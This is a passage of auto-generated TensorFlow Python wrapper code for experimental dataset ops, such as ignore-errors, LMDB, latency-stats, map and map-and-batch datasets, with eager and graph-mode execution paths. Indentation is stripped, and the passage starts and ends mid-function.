output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalIgnoreErrorsDataset", name,
_ctx._post_execution_callbacks, input_dataset, "output_types",
output_types, "output_shapes", output_shapes)
return _result
except _core._FallbackException:
try:
return experimental_ignore_errors_dataset_eager_fallback(
input_dataset, output_types=output_types,
output_shapes=output_shapes, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_ignore_errors_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_ignore_errors_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalIgnoreErrorsDataset", input_dataset=input_dataset,
output_types=output_types,
output_shapes=output_shapes,
name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"ExperimentalIgnoreErrorsDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalIgnoreErrorsDataset(input_dataset, output_types, output_shapes, name=None):
return experimental_ignore_errors_dataset(input_dataset=input_dataset, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalIgnoreErrorsDataset.__doc__ = experimental_ignore_errors_dataset.__doc__
ExperimentalIgnoreErrorsDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalIgnoreErrorsDataset))
tf_export("raw_ops.ExperimentalIgnoreErrorsDataset")(ExperimentalIgnoreErrorsDataset)
def experimental_ignore_errors_dataset_eager_fallback(input_dataset, output_types, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_ignore_errors_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_ignore_errors_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_ignore_errors_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
_inputs_flat = [input_dataset]
_attrs = ("output_types", output_types, "output_shapes", output_shapes)
_result = _execute.execute(b"ExperimentalIgnoreErrorsDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalIgnoreErrorsDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_indexed_dataset_get(materialized, index, output_types, output_shapes, name=None):
r"""TODO: add doc.
Args:
materialized: A `Tensor` of type `resource`.
index: A `Tensor` of type `uint64`.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A list of `Tensor` objects of type `output_types`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalIndexedDatasetGet", name, _ctx._post_execution_callbacks,
materialized, index, "output_types", output_types, "output_shapes",
output_shapes)
return _result
except _core._FallbackException:
try:
return experimental_indexed_dataset_get_eager_fallback(
materialized, index, output_types=output_types,
output_shapes=output_shapes, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_indexed_dataset_get' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_indexed_dataset_get' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalIndexedDatasetGet", materialized=materialized,
index=index,
output_types=output_types,
output_shapes=output_shapes,
name=name)
_result = _op.outputs[:]
if not _result:
return _op
_inputs_flat = _op.inputs
_attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"ExperimentalIndexedDatasetGet", _inputs_flat, _attrs, _result, name)
return _result
def ExperimentalIndexedDatasetGet(materialized, index, output_types, output_shapes, name=None):
return experimental_indexed_dataset_get(materialized=materialized, index=index, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalIndexedDatasetGet.__doc__ = experimental_indexed_dataset_get.__doc__
ExperimentalIndexedDatasetGet = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalIndexedDatasetGet))
tf_export("raw_ops.ExperimentalIndexedDatasetGet")(ExperimentalIndexedDatasetGet)
def experimental_indexed_dataset_get_eager_fallback(materialized, index, output_types, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_indexed_dataset_get
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_indexed_dataset_get' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_indexed_dataset_get' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
materialized = _ops.convert_to_tensor(materialized, _dtypes.resource)
index = _ops.convert_to_tensor(index, _dtypes.uint64)
_inputs_flat = [materialized, index]
_attrs = ("output_types", output_types, "output_shapes", output_shapes)
_result = _execute.execute(b"ExperimentalIndexedDatasetGet",
len(output_types), inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"ExperimentalIndexedDatasetGet", _inputs_flat, _attrs, _result, name)
return _result
def experimental_indexed_dataset_materialize(dataset, materialized, name=None):
r"""TODO: add doc.
Args:
dataset: A `Tensor` of type `variant`.
materialized: A `Tensor` of type `resource`.
name: A name for the operation (optional).
Returns:
The created Operation.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalIndexedDatasetMaterialize", name,
_ctx._post_execution_callbacks, dataset, materialized)
return _result
except _core._FallbackException:
try:
return experimental_indexed_dataset_materialize_eager_fallback(
dataset, materialized, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalIndexedDatasetMaterialize", dataset=dataset,
materialized=materialized,
name=name)
return _op
_result = None
return _result
def ExperimentalIndexedDatasetMaterialize(dataset, materialized, name=None):
return experimental_indexed_dataset_materialize(dataset=dataset, materialized=materialized, name=name)
ExperimentalIndexedDatasetMaterialize.__doc__ = experimental_indexed_dataset_materialize.__doc__
ExperimentalIndexedDatasetMaterialize = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalIndexedDatasetMaterialize))
tf_export("raw_ops.ExperimentalIndexedDatasetMaterialize")(ExperimentalIndexedDatasetMaterialize)
def experimental_indexed_dataset_materialize_eager_fallback(dataset, materialized, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_indexed_dataset_materialize
"""
_ctx = ctx if ctx else _context.context()
dataset = _ops.convert_to_tensor(dataset, _dtypes.variant)
materialized = _ops.convert_to_tensor(materialized, _dtypes.resource)
_inputs_flat = [dataset, materialized]
_attrs = None
_result = _execute.execute(b"ExperimentalIndexedDatasetMaterialize", 0,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_result = None
return _result
def experimental_iterator_get_device(resource, name=None):
r"""Returns the name of the device on which `resource` has been placed.
Args:
resource: A `Tensor` of type `resource`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `string`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalIteratorGetDevice", name, _ctx._post_execution_callbacks,
resource)
return _result
except _core._FallbackException:
try:
return experimental_iterator_get_device_eager_fallback(
resource, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalIteratorGetDevice", resource=resource, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
_execute.record_gradient(
"ExperimentalIteratorGetDevice", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalIteratorGetDevice(resource, name=None):
return experimental_iterator_get_device(resource=resource, name=name)
ExperimentalIteratorGetDevice.__doc__ = experimental_iterator_get_device.__doc__
ExperimentalIteratorGetDevice = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalIteratorGetDevice))
tf_export("raw_ops.ExperimentalIteratorGetDevice")(ExperimentalIteratorGetDevice)
def experimental_iterator_get_device_eager_fallback(resource, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_iterator_get_device
"""
_ctx = ctx if ctx else _context.context()
resource = _ops.convert_to_tensor(resource, _dtypes.resource)
_inputs_flat = [resource]
_attrs = None
_result = _execute.execute(b"ExperimentalIteratorGetDevice", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalIteratorGetDevice", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_lmdb_dataset(filenames, output_types, output_shapes, name=None):
r"""TODO: add doc.
Args:
filenames: A `Tensor` of type `string`.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalLMDBDataset", name, _ctx._post_execution_callbacks,
filenames, "output_types", output_types, "output_shapes",
output_shapes)
return _result
except _core._FallbackException:
try:
return experimental_lmdb_dataset_eager_fallback(
filenames, output_types=output_types, output_shapes=output_shapes,
name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_lmdb_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_lmdb_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalLMDBDataset", filenames=filenames,
output_types=output_types,
output_shapes=output_shapes, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"ExperimentalLMDBDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalLMDBDataset(filenames, output_types, output_shapes, name=None):
return experimental_lmdb_dataset(filenames=filenames, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalLMDBDataset.__doc__ = experimental_lmdb_dataset.__doc__
ExperimentalLMDBDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalLMDBDataset))
tf_export("raw_ops.ExperimentalLMDBDataset")(ExperimentalLMDBDataset)
def experimental_lmdb_dataset_eager_fallback(filenames, output_types, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_lmdb_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_lmdb_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_lmdb_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
filenames = _ops.convert_to_tensor(filenames, _dtypes.string)
_inputs_flat = [filenames]
_attrs = ("output_types", output_types, "output_shapes", output_shapes)
_result = _execute.execute(b"ExperimentalLMDBDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalLMDBDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_latency_stats_dataset(input_dataset, tag, output_types, output_shapes, name=None):
r"""Records the latency of producing `input_dataset` elements in a StatsAggregator.
Args:
input_dataset: A `Tensor` of type `variant`.
tag: A `Tensor` of type `string`.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalLatencyStatsDataset", name,
_ctx._post_execution_callbacks, input_dataset, tag, "output_types",
output_types, "output_shapes", output_shapes)
return _result
except _core._FallbackException:
try:
return experimental_latency_stats_dataset_eager_fallback(
input_dataset, tag, output_types=output_types,
output_shapes=output_shapes, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_latency_stats_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_latency_stats_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalLatencyStatsDataset", input_dataset=input_dataset,
tag=tag, output_types=output_types,
output_shapes=output_shapes,
name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"ExperimentalLatencyStatsDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalLatencyStatsDataset(input_dataset, tag, output_types, output_shapes, name=None):
return experimental_latency_stats_dataset(input_dataset=input_dataset, tag=tag, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalLatencyStatsDataset.__doc__ = experimental_latency_stats_dataset.__doc__
ExperimentalLatencyStatsDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalLatencyStatsDataset))
tf_export("raw_ops.ExperimentalLatencyStatsDataset")(ExperimentalLatencyStatsDataset)
def experimental_latency_stats_dataset_eager_fallback(input_dataset, tag, output_types, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_latency_stats_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_latency_stats_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_latency_stats_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
tag = _ops.convert_to_tensor(tag, _dtypes.string)
_inputs_flat = [input_dataset, tag]
_attrs = ("output_types", output_types, "output_shapes", output_shapes)
_result = _execute.execute(b"ExperimentalLatencyStatsDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalLatencyStatsDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_map_and_batch_dataset(input_dataset, other_arguments, batch_size, num_parallel_calls, drop_remainder, f, output_types, output_shapes, preserve_cardinality=False, name=None):
r"""Creates a dataset that fuses mapping with batching.
Creates a dataset that applies `f` to the outputs of `input_dataset` and then
batches `batch_size` of them.
Unlike a "MapDataset", which applies `f` sequentially, this dataset invokes up
to `batch_size * num_parallel_batches` copies of `f` in parallel.
Args:
input_dataset: A `Tensor` of type `variant`.
A variant tensor representing the input dataset.
other_arguments: A list of `Tensor` objects.
A list of tensors, typically values that were captured when building a closure
for `f`.
batch_size: A `Tensor` of type `int64`.
A scalar representing the number of elements to accumulate in a
batch. It determines the number of concurrent invocations of `f` that process
elements from `input_dataset` in parallel.
num_parallel_calls: A `Tensor` of type `int64`.
A scalar representing the maximum number of parallel invocations of the `map_fn`
function. Applying the `map_fn` on consecutive input elements in parallel has
the potential to improve input pipeline throughput.
drop_remainder: A `Tensor` of type `bool`.
A scalar representing whether the last batch should be dropped in case its size
is smaller than desired.
f: A function decorated with @Defun.
A function to apply to the outputs of `input_dataset`.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
preserve_cardinality: An optional `bool`. Defaults to `False`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalMapAndBatchDataset", name,
_ctx._post_execution_callbacks, input_dataset, other_arguments,
batch_size, num_parallel_calls, drop_remainder, "f", f,
"output_types", output_types, "output_shapes", output_shapes,
"preserve_cardinality", preserve_cardinality)
return _result
except _core._FallbackException:
try:
return experimental_map_and_batch_dataset_eager_fallback(
input_dataset, other_arguments, batch_size, num_parallel_calls,
drop_remainder, f=f, output_types=output_types,
output_shapes=output_shapes,
preserve_cardinality=preserve_cardinality, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_map_and_batch_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_map_and_batch_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
if preserve_cardinality is None:
preserve_cardinality = False
preserve_cardinality = _execute.make_bool(preserve_cardinality, "preserve_cardinality")
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalMapAndBatchDataset", input_dataset=input_dataset,
other_arguments=other_arguments,
batch_size=batch_size,
num_parallel_calls=num_parallel_calls,
drop_remainder=drop_remainder, f=f,
output_types=output_types,
output_shapes=output_shapes,
preserve_cardinality=preserve_cardinality,
name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("f", _op.get_attr("f"), "Targuments", _op.get_attr("Targuments"),
"output_types", _op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"), "preserve_cardinality",
_op.get_attr("preserve_cardinality"))
_execute.record_gradient(
"ExperimentalMapAndBatchDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalMapAndBatchDataset(input_dataset, other_arguments, batch_size, num_parallel_calls, drop_remainder, f, output_types, output_shapes, preserve_cardinality=False, name=None):
return experimental_map_and_batch_dataset(input_dataset=input_dataset, other_arguments=other_arguments, batch_size=batch_size, num_parallel_calls=num_parallel_calls, drop_remainder=drop_remainder, f=f, output_types=output_types, output_shapes=output_shapes, preserve_cardinality=preserve_cardinality, name=name)
ExperimentalMapAndBatchDataset.__doc__ = experimental_map_and_batch_dataset.__doc__
ExperimentalMapAndBatchDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalMapAndBatchDataset))
tf_export("raw_ops.ExperimentalMapAndBatchDataset")(ExperimentalMapAndBatchDataset)
def experimental_map_and_batch_dataset_eager_fallback(input_dataset, other_arguments, batch_size, num_parallel_calls, drop_remainder, f, output_types, output_shapes, preserve_cardinality=False, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_map_and_batch_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_map_and_batch_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_map_and_batch_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
if preserve_cardinality is None:
preserve_cardinality = False
preserve_cardinality = _execute.make_bool(preserve_cardinality, "preserve_cardinality")
_attr_Targuments, other_arguments = _execute.convert_to_mixed_eager_tensors(other_arguments, _ctx)
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
batch_size = _ops.convert_to_tensor(batch_size, _dtypes.int64)
num_parallel_calls = _ops.convert_to_tensor(num_parallel_calls, _dtypes.int64)
drop_remainder = _ops.convert_to_tensor(drop_remainder, _dtypes.bool)
_inputs_flat = [input_dataset] + list(other_arguments) + [batch_size, num_parallel_calls, drop_remainder]
_attrs = ("f", f, "Targuments", _attr_Targuments, "output_types",
output_types, "output_shapes", output_shapes, "preserve_cardinality",
preserve_cardinality)
_result = _execute.execute(b"ExperimentalMapAndBatchDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalMapAndBatchDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_map_dataset(input_dataset, other_arguments, f, output_types, output_shapes, use_inter_op_parallelism=True, preserve_cardinality=False, name=None):
r"""Creates a dataset that applies `f` to the outputs of `input_dataset`.
Args:
input_dataset: A `Tensor` of type `variant`.
other_arguments: A list of `Tensor` objects.
f: A function decorated with @Defun.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
use_inter_op_parallelism: An optional `bool`. Defaults to `True`.
preserve_cardinality: An optional `bool`. Defaults to `False`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"ExperimentalMapDataset", name, _ctx._post_execution_callbacks,
input_dataset, other_arguments, "f", f, "output_types", output_types,
"output_shapes", output_shapes, "use_inter_op_parallelism",
use_inter_op_parallelism, "preserve_cardinality",
preserve_cardinality)
return _result
except _core._FallbackException:
try:
return experimental_map_dataset_eager_fallback(
input_dataset, other_arguments, f=f, output_types=output_types,
output_shapes=output_shapes,
use_inter_op_parallelism=use_inter_op_parallelism,
preserve_cardinality=preserve_cardinality, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_map_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_map_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
if use_inter_op_parallelism is None:
use_inter_op_parallelism = True
use_inter_op_parallelism = _execute.make_bool(use_inter_op_parallelism, "use_inter_op_parallelism")
if preserve_cardinality is None:
preserve_cardinality = False
preserve_cardinality = _execute.make_bool(preserve_cardinality, "preserve_cardinality")
_, _, _op = _op_def_lib._apply_op_helper(
"ExperimentalMapDataset", input_dataset=input_dataset,
other_arguments=other_arguments, f=f,
output_types=output_types,
output_shapes=output_shapes,
use_inter_op_parallelism=use_inter_op_parallelism,
preserve_cardinality=preserve_cardinality,
name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("f", _op.get_attr("f"), "Targuments", _op.get_attr("Targuments"),
"output_types", _op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"), "use_inter_op_parallelism",
_op.get_attr("use_inter_op_parallelism"), "preserve_cardinality",
_op.get_attr("preserve_cardinality"))
_execute.record_gradient(
"ExperimentalMapDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def ExperimentalMapDataset(input_dataset, other_arguments, f, output_types, output_shapes, use_inter_op_parallelism=True, preserve_cardinality=False, name=None):
return experimental_map_dataset(input_dataset=input_dataset, other_arguments=other_arguments, f=f, output_types=output_types, output_shapes=output_shapes, use_inter_op_parallelism=use_inter_op_parallelism, preserve_cardinality=preserve_cardinality, name=name)
ExperimentalMapDataset.__doc__ = experimental_map_dataset.__doc__
ExperimentalMapDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalMapDataset))
tf_export("raw_ops.ExperimentalMapDataset")(ExperimentalMapDataset)
def experimental_map_dataset_eager_fallback(input_dataset, other_arguments, f, output_types, output_shapes, use_inter_op_parallelism=True, preserve_cardinality=False, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function experimental_map_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'experimental_map_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'experimental_map_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
if use_inter_op_parallelism is None:
use_inter_op_parallelism = True
use_inter_op_parallelism = _execute.make_bool(use_inter_op_parallelism, "use_inter_op_parallelism")
if preserve_cardinality is None:
preserve_cardinality = False
preserve_cardinality = _execute.make_bool(preserve_cardinality, "preserve_cardinality")
_attr_Targuments, other_arguments = _execute.convert_to_mixed_eager_tensors(other_arguments, _ctx)
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
_inputs_flat = [input_dataset] + list(other_arguments)
_attrs = ("f", f, "Targuments", _attr_Targuments, "output_types",
output_types, "output_shapes", output_shapes, "use_inter_op_parallelism",
use_inter_op_parallelism, "preserve_cardinality", preserve_cardinality)
_result = _execute.execute(b"ExperimentalMapDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalMapDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def experimental_matching_files_dataset(patterns, name=None):
r"""TODO: add doc.
Args:
patterns: A `Tensor` of type `string`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
